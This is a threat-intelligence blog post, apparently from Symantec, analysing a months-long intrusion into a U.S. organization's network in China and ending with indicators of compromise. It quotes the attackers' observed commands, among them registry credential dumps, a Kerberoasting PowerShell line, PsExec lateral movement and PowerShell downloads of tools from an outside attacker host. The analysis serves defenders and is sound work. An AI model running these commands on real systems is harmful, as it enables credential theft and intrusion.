Posted: 9 Min ReadThreat Intelligence

U.S. Organization in China Targeted by Attackers

Large U.S. organization was the subject of a four-month-long intrusion by China-based attackers.

A large U.S. organization with a significant presence in China was the subject of a targeted attack earlier this year, during which the attackers obtained a persistent presence on its network, seemingly for the purpose of intelligence gathering. The attack was likely carried out by a China-based threat actor, since some of the tools used in this attack have been previously associated with Chinese attackers. 

While it is possible that actual network intrusion occurred earlier, the first evidence of the attacker’s activity dates from April 2024, and this malicious activity continued until August 2024. The attackers moved laterally across the organization’s network, compromising multiple computers. Some of the machines targeted were Exchange Servers, suggesting the attackers were gathering intelligence by harvesting emails. Exfiltration tools were also deployed, suggesting that targeted data was taken from the organizations. 

Tools and tactics

DLL-sideloading: The attackers used several legitimate applications to load malware, a technique known as DLL-sideloading, where the attackers use the DLL search order mechanism in Windows to plant and then invoke a legitimate application that executes a malicious DLL payload. In this case, several Google and Apple applications were used to perform sideloading (GoogleToolbarNotifier.exe and iTunesHelper.exe).

Impacket: An open-source collection of modules written in Python, a general purpose programming language, for programmatically constructing and manipulating network protocols. It contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.

FileZilla: An open-source FTP client and server available for Windows, Linux, and macOS. 

PSCP: A Secure Copy Protocol (SCP) client created by the same developers as the PuTTY SSH client.

Living off the land: The attackers also leveraged several living-off-the-land tools, including:

  • WMI (Windows Management Instrumentation): Microsoft command-line tool that can be used to execute commands on remote computers.
  • PsExec: Microsoft Sysinternals tool for executing processes on other systems. The tool is primarily used by attackers to move laterally on victim networks.
  • PowerShell: Microsoft scripting tool that can be used to run commands, download payloads, traverse compromised networks, and carry out reconnaissance.

Attack timeline – Machine 1

The initial infection vector remains unknown. However, the first evidence of malicious activity dates from April 11, 2024, when a suspicious command was executed on one computer via WMI, which bore the hallmarks of a tool leveraging Impacket from another machine on the network:
cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1

cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1712807675.4462686 2>&1

The fact that the command originated from another machine on the network suggests that the attackers had already compromised at least one other machine on the organization’s network and that the intrusion may have begun prior to April 11.

The attackers then attempted to mount a network share using the “net use” command. Next, they dumped credentials from the registry using reg.exe: 

reg save hklm\system ss

reg save hklm\sam sa

A minute later, they attempted to mount another network share, using the “net use” command, specifically attempting to mount a drive connected to a network attached storage (NAS) device.

A few hours later, the attackers returned and ran netstat to check for all open TCP (active and listening) connections. 

The attackers then executed another encoded PowerShell script, which decoded as:

$ProgressPreference="SilentlyContinue";setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

The command queries Active Directory (AD) for service principal names (SPNs), which are accounts associated with services within the AD. The command then processes the output to extract relevant details and then extracts a Kerberos security token for each matching SPN. 

This is a tactic called Kerberoasting and is used to steal credentials specifically for service accounts, which the attackers likely attempt to crack offline in an effort to gain access to privileged accounts to assist in moving laterally across the network.

It is also interesting to note that the domain specified in the above command “medin.local” is the default domain name used in a number of publicly available Kerberoast tools and scripts, suggesting the attackers are directly leveling off-the-shelf tooling without any modifications.

The attackers were then observed modifying some of the commands and executing several further PowerShell commands, this time with the correct domain:

$ProgressPreference=“SilentlyContinue”;setspn -T [REMOVED] -Q */*

$ProgressPreference=“SilentlyContinue”;klist

$ProgressPreference=“SilentlyContinue”;klist  tgt

The “klist” command lists the current Kerberos tickets for the user, giving visibility into the user's active Kerberos authentication status. Additionally, “tgt” refers to the Ticket Granting Ticket, which is a special type of ticket used to authenticate to the Key Distribution Center (KDC). This is likely targeted by the attackers to obtain other service tickets to attempt to crack offline.

On April 16, malicious activity resumed on the same computer when the attackers launched a command prompt via WMI.

The next day, they proceeded to execute a file named rc.exe, which is a renamed version of Google’s application GoogleToolbarNotifier. This file was used to sideload a malicious DLL named gtn.dll.

Attack timeline – Machine 2

Malicious activity began on a second machine, a web server, on June 2, 2024. The attackers again used the change directory command via WMI, with the structure of the command suggesting that Impacket was used:

cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1717319212.299007 2>&1

Minutes later, the attackers ran a file named putty.exe. Despite the name, the application is actually the SFTP component of FileZilla, which is based on PuTTY’s Secure File Transfer Protocol (SFTP) client. This was likely installed for data exfiltration purposes. 

On June 13, the same file was executed multiple times via WMI. 

The next day (June 14), PowerShell was used to download files from a remote host to the perflogs directory: 

powershell (new-object System.Net.WebClient).DownloadFile( 'hxxp://149.28.154.23:443/rar.exe','CSIDL_SYSTEM_DRIVE\perflogs\rar.exe')

powershell (new-object System.Net.WebClient).DownloadFile( 'hxxp://149.28.154.23:443/vmtools.exe','CSIDL_SYSTEM_DRIVE\perflogs\vmtools.exe')

Although not recovered, rar.exe was likely the command-line version of WinRAR. The file named vmtools.exe was a renamed version of PSCP, the Secure Copy Protocol (SCP) client created by the same developers as PuTTY SSH.

Malicious activity on this computer resumed on June 27, when a number of commands were executed, mostly via PsExec. Among the files run was the legitimate Google application GoogleUpdate.exe. Among the suspicious files found on this machine were two named ibnettle-6.dll and textinputhost.dat. It is possible that one or both were malicious files that were sideloaded. Textinputhost.dat was previously reported by Sophos and Recorded Future as being used by the Chinese Crimson Palace group in attacks against targets in Southeast Asia. 

Attack timeline – Machine 3

Malicious activity began on a third machine on June 2, when WMI was used to execute wevtutil to query the Windows Event Log from a remote machine on the network:

wevtutil qe security /rd:true /f:text /q:”*[System[(EventID=4624) or (EventID=4672) or (EventID=4634) or (EventID=4673) or (EventID=4740)]] and *[System[TimeCreated[timediff(@SystemTime)<=2592000000]]]”

The command was structured to query the security event log for the following events:

  • EventID=4624: A successful logon event.
  • EventID=4672: Special privileges assigned to a new logon.
  • EventID=4634: Logoff event.
  • EventID=4673: Indicates that a privileged service was called.
  • EventID=4740: An account was locked out.

Immediately afterwards, the attackers ran a PowerShell script via WMI:

cmd.exe /Q /c powershell echo ((new-object Net.Sockets.TcpClient).Connect(\”192.168.92.92\”,135)) “open!” 1> \\127.0.0.1\ADMIN$\__1717327352.4534295 2>&1

It is possible that the attackers are using this script to test connectivity back to another computer on the network specifically to confirm if Microsoft’s remote procedure call (RPC) service was available (port 135). The attackers also attempted to connect to the same machine using port 3389 (usually reserved for RDP):

powershell echo ((new-object Net.Sockets.TcpClient).Connect(\”192.168.92.92\”,3389)) “open!”

The attackers returned on June 20 and launched a command prompt via PsExec from another machine on the network (192.168.88.235). Several net commands were then executed:

CSIDL_SYSTEM\net1 group “Exchange Servers” /domain

The commands are used to display information pertaining to specific groups of the domain. One group the attackers were particularly interested in is "Exchange Servers", suggesting the attackers were attempting to target mail servers to collect and possibly exfiltrate email data. 

Later in the same day, a suspicious PowerShell command was executed via PsExec:

powershell -exec bypass -command “Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate|Format-Table -AutoSize |Out-File -FilePath “ CSIDL_COMMON_APPDATA\computer.txt -Width ([int]::MaxValue)”

The command retrieves all enabled computers from Active Directory along with their name, DNS hostname, operating system, and last logon date. It then formats the information into a table and saves it to a file called computer.txt. Minutes later, the quser command was executed to list all logged in/activate user accounts on the machine.

The next day (June 21), the machine was used again to launch a command prompt on another machine on the network:

PsExec64.exe \\192.168.92.79 -accepteula cmd

Attack timeline – Machine 4

On June 5, a suspicious command was executed on a fourth computer via WMI: 

reg.exe export “HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs” CSIDL_WINDOWS\temp\ts_2011.tmp 

The command exports registry key values to a .TMP file. The registry key Control\Session Manager\KnownDLLs holds a list of trusted DLLs that the system typically loads from the System32 directory during system boot-up that may be leveraged by other processes. Exporting this key will copy all the registry values associated with these KnownDLLs and may provide information to the attackers on what file names may appear innocuous if reused or, more likely, for the purposes of DLL hijacking. This is a common attack where malicious DLLs are placed in directories to be loaded instead of legitimate system DLLs.

Attack timeline – Machine 5

One June 13, activity commenced on a fifth machine when a command was executed via WMI to change the directory to the root drive. The attackers then attempted to launch the application iTunesHelper.exe from the PerfLogs directory. This was likely launched to load a malicious DLL (CoreFoundation.dll) using the sideloading technique (we have seen this done many times before with this same binary using CoreFoundation.dll).

Links to known actors

The available evidence suggests that the organization was breached by a China-based actor. Aside from the fact that DLL sideloading is a widely favored tactic among Chinese groups, the same organization was targeted in 2023 by an attacker with tentative links to the China-based Daggerfly group. 

The file textinputhost.dat was previously reported by Sophos and RecordedFuture as being leveraged by China-based espionage group Crimson Palace in attacks against Southeast Asia. In that case, it was used in conjunction with an executable named rc.exe. The same file name was also used by the attackers who conducted this attack.

The behavioral security technologies in Symantec Endpoint Security provide our customers with protection from fileless, Living Off the Land, and behavior-based attacks, including atypical command-line activity and suspicious application behaviors such as non-process executables or DLL sideloading. Read more about those technologies here.

For the latest protection updates, please visit the Symantec Protection Bulletin

Indicators of Compromise

If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.

9affdcdb398d437e2e1cd9bc1ccf2d101d79fc6d87e95e960e50847a141faa4 — PsExec

51fe904458e216e75909f82a33dc4f163250b498b4e2d365880184e806d3db1a — iTunesHelper 

23221b6f95b9e3b165a84570212f2c8681cf888aa0fa78822f8500357eeafaf0 — CoreFoundation.dll 

86fd8328765e4803feedf5878a08c149c08d47c336578261a08a3e1933b68daa — PSCP (renamed as vmtools.exe)

472a513eb60cba4a2320ebbc10d84679ebaa1a8f90e5a3764902a456b3936a17 — libnettle-6.dll

f2fa6ae29306ed7171f2e9563ced9bbd6e337ed8c389b319df3c6b46eeb050f0 — SFTP component from FileZilla

c1bec59afd3c6071b461bb480ff88ba7e36759a949f4850cc26f0c18e4c811a0 — textinputhost.dat 

edfae1a69522f87b12c6dac3225d930e4848832e3c551ee1e7d31736bf4525ef — PsExec 

1f6b69d11a3066e21c40002a25986c44e24a66f023a40e5f49eecaea33f5576d — GoogleUpdate 

d32cc7b31a6f98c60abc313abc7d1143681f72de2bb2604711a0ba20710caaae — GoogleToolbarNotifier 

ff91bbe7bd4e6d5498b1332f0ad233dcf0ad5fc0d31f870a92142731354d739c — gtn.dll 

hxxp://149.28.154[.]23:443

About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.